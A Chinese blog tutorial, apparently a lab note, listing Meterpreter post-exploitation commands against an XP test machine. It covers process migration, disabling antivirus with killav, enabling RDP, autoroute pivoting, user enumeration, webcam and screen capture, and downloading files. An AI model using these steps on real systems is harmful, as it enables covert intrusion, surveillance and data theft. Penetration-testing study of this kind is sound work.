zoukankan      html  css  js  c++  java
  • Meterpreter后渗透之信息收集

    在获得目标的Meterpreter shell后 进行信息收集是后渗透工作的基础

    记录一下关于meterpreter 信息收集的使用

    环境: kali linux 192.168.190.141

           xp靶机 192.168.190.140

    生成木马 监听反弹shell上线

    信息收集:

     

     ========================================================================================================================

    0x01进程迁移:

    ps命令获取目标正在运行的进程:

    getpid命令查看 meterpreter shell的进程号:

     可以看到pid为488 进程名为win.exe

    使用migrate命令 进行shell的进程迁移:

    成功迁移到pid为768的explorer.exe进程中。

    迁移后原shell的进程(pid为488)会自动关闭,没有关闭也可以输入kill指令关闭 kill 488 

    也可以使用自动迁移进程命令:

    run post/windows/manage/migrate

    0x02 系统命令

    获得稳定进程后,接下来收集系统信息。

    sysinfo查看目标系统信息

     查看是否是虚拟机 run post/windows/gather/checkvm

    idletime命令查看目标机最近运行时间:

    route命令查看目标机完整网络设置:

     

    getuid获得用户名和计算机名称

    run post/windows/manage/killav 命令关闭杀毒软件

     

    run post/windows/manage/enable_rdp 开启3389

     run get_local_subnets 查看目标机本地子网情况

    在meterpreter 会话上直接添加去往目标网段的路由

    run autoroute -s xxxxx

    查看路由添加情况 

    run autoroute -p

    枚举当前有多少用户:

    run post/windows/gather/enum_logged_users

    screenshot命令抓取主机屏幕截图:

    webcam_list 查看目标机是否有摄像头;

    webcam_snap命令打开摄像头,拍一张照片

    webcam_stram命令开启直播模式

    shell命令进入目标机shell;

     exit停止meterpreter会话 也可以用于shell返回meterpreter会话。

     

     

    文件系统命令

    pwd或者getwd查看shell处于的目标

     

    getlwd 查看当前处于本地哪个目录

     cd 切换目录 search搜索文件 例如 search -f *.txt -d c:\

    download 命令下载文件

    upload命令上传文件

  • 相关阅读:
    Python 学习 第八篇:函数2(参数、lamdba和函数属性)
    Python 学习 第七篇:函数1(定义、调用和变量的作用域)
    Python 学习 第六篇:迭代和解析
    Python 学习 第四篇:动态类型模型
    物联网环境下数据分析的应用
    Python 学习 第一篇:数据类型(数字,布尔类型,操作符)
    写于2018年底,有点丧
    云计算助力大数据分析
    python中的__init__方法
    load、loads和 dump、dumps的区别
  • 原文地址:https://www.cnblogs.com/-qing-/p/10509097.html
Copyright © 2011-2022 走看看